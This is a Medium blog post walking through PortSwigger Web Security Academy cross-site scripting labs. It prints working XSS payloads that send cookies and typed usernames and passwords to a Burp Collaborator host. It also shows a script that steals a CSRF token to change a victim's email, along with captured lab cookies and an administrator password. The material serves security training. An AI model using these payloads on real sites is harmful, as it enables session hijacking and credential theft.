Cross site scripting | xss explain(PORTSWIGGER solve)

Reflected xss lab
For this lab we are going to enter a post and make a comment while intercepting all packets in the background using the burpsuite tool. Then we send it to the repeater and prepare our payload.<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>So we send it on the repeater, and wait for the response on the burp collaborator.Also select payload in burp and press CTRL+U to URL encode in burp.
secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6l

Lab 3 : Exploiting cross-site scripting to capture passwords

<input required="" type="username" name="username">
<input required="" type="password" name="password">
document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].value
<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>
But it sends it without information, this can happen because at the time of making the document.location the autocomplete has not yet been carried out, so we will use the onchange attribute.<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">
administrator:ef6gbovly0a77qvxul8i

Lab: Exploiting XSS to perform CSRF

POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1

email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=a@a.a')
};
</script>

--

--

--

Career in Cyber security. Technolgy lover.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cors Misconfiguration : Steal victim token and PII leads to ATO

Digital14 Becomes the New Face to Continue DarkMatter’s Cyber Operations

INTERNET OF THINGS

Cronos Testnet v0.7.0 Upgrade — Release Notes

Copycat Attack on Balancer: Why DeFi Needs to Change

Account Takeover Fraud — What is It and How to Stop It?

account takeover fraud cover image

February Release Notes

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
vijay nariyal

vijay nariyal

Career in Cyber security. Technolgy lover.

More from Medium

XSS Vulnerability Part 2

Stored XSS into HTML

AlbusSec:- Penetration-List 03 Open-Redirection

SQL Injection is Where Clause — Burp Academy Labs